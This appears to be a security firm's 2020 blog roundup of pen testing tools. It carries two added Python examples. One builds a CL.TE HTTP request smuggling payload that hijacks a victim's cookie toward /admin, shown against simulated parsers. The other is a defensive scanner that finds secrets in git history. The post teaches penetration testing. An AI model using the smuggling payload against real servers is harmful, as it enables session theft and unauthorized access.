Around this time last year, we released a list of our favorite pen testing tools for client engagements and in our own research. This year, we’re updating that list with some new additions (thanks to Jim Holcumb, Matt Keeley, and Chris Davis for their help compiling this new-for-2020 list.) A reminder before we get into the thick of it: this list isn’t intended to be comprehensive or definitive. It’s simply a selection of some tools we appreciated over the past several months that we think readers will find helpful. Hit us up with your own suggestions in the comments or on Twitter @bishopfox.
Creator: Project Discovery (@pdiscoveryio)
Its Use: Nuclei is a fast, template-driven vulnerability scanner with a community-maintained template repository.
Why We Like It: If you choose to download only one tool on this list, make it this one. Nuclei is noteworthy for its sizable, frequently updated repository of vulnerability templates as well as its speed. The modern web is massive and changes constantly, and the scanners of yesteryear simply can't keep up. Nuclei lets you sweep a large number of hosts for known issues in minutes, which makes it a good first pass before you spend manual effort on a target. The usual caveat applies: a template match is a lead, not a finding, so confirm it by hand before it goes in a report.
Creator: Spyse (@SpyseHQ)
Its Use: Imagine a search engine, but built strictly for the security community. That's Spyse. The difference between it and a traditional search engine is that Spyse lets you search by CVE and returns the hosts it has indexed as affected.
Why We Like It: This makes information-gathering and other OSINT work for your security assessments much easier. On engagements with larger clients, Spyse helps you spot public exposures faster and saves you time you can spend doing the fun stuff (AKA breaking into things). Just remember that its results come from Spyse's own index, so verify that a host is actually in scope and actually exposed before you act on it.
Creator: defparam (@defparam)
Its Use: Smuggler is an HTTP request smuggling (desync) detection tool written in Python.
Why We Like It: Inspired by James Kettle's desync research, Smuggler automates the CL.TE and TE.CL probes against a target, and you can pair it with Burp Suite for manual follow-up and maximum coverage. (Speaking of request smuggling, check out the HTTP/2 Cleartext (h2c) smuggling variant we identified.)
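To make the desync that Smuggler hunts for concrete, here is the CL.TE case modelled end to end. This is an added example, not Smuggler's code or the original post's: a front-end that frames requests by Content-Length and a back-end that frames them by Transfer-Encoding read the same bytes differently, and whatever the front-end forwards as "body" becomes the start of the next request on the back-end's reused connection. Both parsers are deliberately minimal models of that framing logic, not real servers, and the host name and victim request are constructed for the demo.

```python
"""CL.TE request smuggling, modelled end to end (added example, not Smuggler's code)."""


def _headers(head: bytes) -> dict:
    """Lower-cased name -> value map for one header block (request line skipped)."""
    out = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        out[name.strip().lower()] = value.strip()
    return out


def _chunked_body_len(body: bytes) -> int:
    """Bytes consumed by a chunked body, through the terminating 0-size chunk.
    Trailer headers are not modelled."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # chunk extensions ignored
        pos = eol + 2 + size + 2                      # size line, data, CRLF
        if size == 0:
            return pos


def read_request(stream: bytes, honour: str) -> tuple[bytes, bytes]:
    """Split one request off the front of `stream`, framing the body the way a
    parser that honours `honour` ("cl" or "te") would. Returns (request, rest)."""
    head, sep, body = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    h = _headers(head)
    if honour == "te" and b"chunked" in h.get(b"transfer-encoding", b"").lower():
        n = _chunked_body_len(body)
    else:
        n = int(h.get(b"content-length", b"0"))
    return head + sep + body[:n], body[n:]


def relay(stream: bytes, honour: str) -> list[bytes]:
    """Every request a parser honouring `honour` extracts from a raw byte stream."""
    requests = []
    while stream:
        req, stream = read_request(stream, honour)
        requests.append(req)
    return requests


def cl_te_probe(prefix: bytes, host: bytes = b"vulnerable.example") -> bytes:
    """Classic CL.TE payload: Content-Length covers the whole body, but the
    chunked encoding ends at the 0-chunk, so `prefix` is left over on the back-end."""
    body = b"0\r\n\r\n" + prefix
    return (b"POST / HTTP/1.1\r\n"
            b"Host: " + host + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"\r\n" + body)


# Constructed: the next legitimate request the front-end forwards on the same
# back-end connection (hypothetical host name).
VICTIM = (b"GET /account HTTP/1.1\r\n"
          b"Host: vulnerable.example\r\n"
          b"Cookie: session=victim\r\n\r\n")


def demo() -> tuple[list[bytes], list[bytes]]:
    """Return (front-end view, back-end view) of attacker request + victim request."""
    attacker = cl_te_probe(b"GET /admin HTTP/1.1\r\nX-Ignore: ")
    stream = attacker + VICTIM
    return relay(stream, "cl"), relay(stream, "te")


if __name__ == "__main__":
    front, back = demo()
    print("front-end saw", len(front), "requests; back-end saw", len(back))
    print("back-end's second request:\n" + back[1].decode())
```

The front-end sees two well-formed requests and forwards them, while the back-end sees the attacker's leftover bytes glued onto the victim's request line, turning the victim's request into a header of a request for /admin that carries the victim's cookie. The TE.CL case is the same model with the roles of the two parsers swapped, which is why a detection tool probes both orderings.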
Creator: OJ Reeves
Its Use: GoBuster, written in Go, brute-forces directories and files, DNS subdomains, and virtual hosts, and it is fast enough to scale to your larger engagements.
Why We Like It: Wordlist-based discovery is only as useful as the number of requests you can push through in the time you have, and GoBuster's concurrency meets that need. (Also, we'd like to give a nod to GoWitness, another Go tool, which screenshots the web services you turn up so you can triage them at a glance.)
Creator: Dylan Ayrey
Its Use: truffleHog is a Python script that searches Git repositories for secrets by walking the commit history, flagging high-entropy strings and known credential patterns in each commit's diff.
Why We Like It: Any tool that helps you find exposed credentials and other secrets locked in source code is a great asset, and scanning history rather than the current tree is what catches the key that was committed and then "removed" in a later commit. truffleHog has been around for several years now, and it's extremely popular due to its reliability. The team behind truffleHog recently launched a company around it, and we wish them luck on this exciting endeavor (and hope to see more kickass tools in the future).
Sidenote: Whereas truffleHog combs through the commit history of a repository you point it at, our tool GitGot searches across public GitHub for secrets. Check it out if you haven't yet.
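Here is the approach truffleHog takes, reduced to its essentials, so you can see why history scanning matters. This is an added example, not truffleHog's or GitGot's code: it walks `git log -p` output, and on every added line it flags tokens whose Shannon entropy looks key-like plus a couple of well-known credential formats. The sample log is constructed; the key values in it are the placeholder credentials from AWS's own documentation, and `git_log_text()` is the one helper that touches a real repository.

```python
"""Secret hunting over git history in the style of truffleHog (added example)."""
import math
import re
import subprocess
from collections import Counter

BASE64_RE = re.compile(r"[A-Za-z0-9+/=]{20,}")
HEX_RE = re.compile(r"[0-9a-fA-F]{20,}")
PATTERNS = {  # a couple of well-known key formats; extend with your own
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}
BASE64_ENTROPY, HEX_ENTROPY = 4.5, 3.0  # truffleHog's original thresholds


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random base64 approaches 6, prose is nearer 4."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def git_log_text(repo: str) -> str:
    """Full history with patches for every ref, in the form scan_git_log() expects."""
    return subprocess.run(["git", "-C", repo, "log", "-p", "--all", "--no-color"],
                          capture_output=True, text=True, check=True).stdout


def scan_git_log(log_text: str) -> list[dict]:
    """Walk `git log -p` output and report suspicious tokens on added lines."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            path = line[4:].removeprefix("b/")
        elif line.startswith("+"):  # added content only; removals are history too,
            added = line[1:]        # but the addition is where the secret first lands
            for reason, pat in PATTERNS.items():
                for m in pat.findall(added):
                    findings.append({"commit": commit, "file": path, "reason": reason, "match": m})
            for tok in BASE64_RE.findall(added):
                if shannon_entropy(tok) > BASE64_ENTROPY:
                    findings.append({"commit": commit, "file": path,
                                     "reason": "high_entropy_base64", "match": tok})
            for tok in HEX_RE.findall(added):
                if shannon_entropy(tok) > HEX_ENTROPY:
                    findings.append({"commit": commit, "file": path,
                                     "reason": "high_entropy_hex", "match": tok})
    return findings


# Constructed sample: the second (older) commit adds credentials, the first
# commit removes them again, so HEAD is clean but the history is not.
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
Author: Dev <dev@example.com>
Date:   Tue Jan 7 10:00:00 2020 +0000

    stop hardcoding credentials

diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -1,3 +1,4 @@
+import os
-AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
-AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_SECRET_ACCESS_KEY = os.environ["AWS_SECRET_ACCESS_KEY"]
 BUCKET = "reports"

commit 1111111111111111111111111111111111111111
Author: Dev <dev@example.com>
Date:   Mon Jan 6 10:00:00 2020 +0000

    add s3 helper

diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -0,0 +1,3 @@
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+BUCKET = "reports"
"""

if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_LOG):
        print(f"{f['commit'][:8]} {f['file']}: {f['reason']} -> {f['match']}")
```

Note that the access key ID is caught by the regex and not by entropy (its entropy is below the base64 threshold), while the secret key is caught by entropy alone; real scanners need both. To run it against a real repository, feed `git_log_text("/path/to/repo")` to `scan_git_log()`.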
Creator: Bishop Fox
Its Use: Want to find secrets accidentally exposed through Amazon EBS snapshots that have been marked public? Then give Dufflebag, which was originally introduced to the world at DEF CON 27, a shot.
Why We Like It: Not only because it's the brainchild of Bishop Fox researchers, but because it's equally beneficial for the blue team and the red team. By finding what you might have exposed, you can further secure your environment and better understand your attack surface; and if you're trying to score some bug bounties, Dufflebag will prove incredibly useful.
Creator: Jake Miller (@theBumbleSec)
Its Use: GadgetProbe takes a wordlist of Java class names, outputs serialized objects that trigger a DNS callback when a named class deserializes, and reports which of those classes are present on the remote classpath.
Why We Like It: GadgetProbe is a handy addition to any pen tester's toolbox. It gives you visibility into which classes (and therefore which libraries and versions) exist on the remote classpath, which is invaluable when designing a custom gadget chain in a black-box situation.
Creator: Jake Miller (@theBumbleSec)
Its Use: RMIScout performs wordlist and brute-force attacks against exposed Java RMI interfaces in order to safely guess method signatures without invoking the methods.
Why We Like It: Once you know a remote method's signature, you know which methods accept attacker-controlled objects, and that is a reliable route to code execution on exposed Java RMI services.
Creator: Aqua Security
Its Use: These two open source tools are intended for testing Kubernetes environments (as you probably figured out). kube-bench checks whether a cluster is configured according to the CIS Kubernetes Benchmark, and kube-hunter actively probes the cluster for weaknesses.
Why We Like It: Aqua Security has been incredibly generous in sharing its open source tools, and these are two of the best you can use for hunting for vulnerabilities in Kubernetes. Run kube-bench from a node so it can read the actual component configuration, and get explicit permission before pointing kube-hunter's active mode at a production cluster.
So there you have it: this year's list of pen testing tools we recommend checking out. We'll be back next year (or maybe sooner) with more choices for your pen testing arsenal, but we suggest stocking up on the aforementioned in the meantime. And, again, send us your suggestions on Twitter: @bishopfox.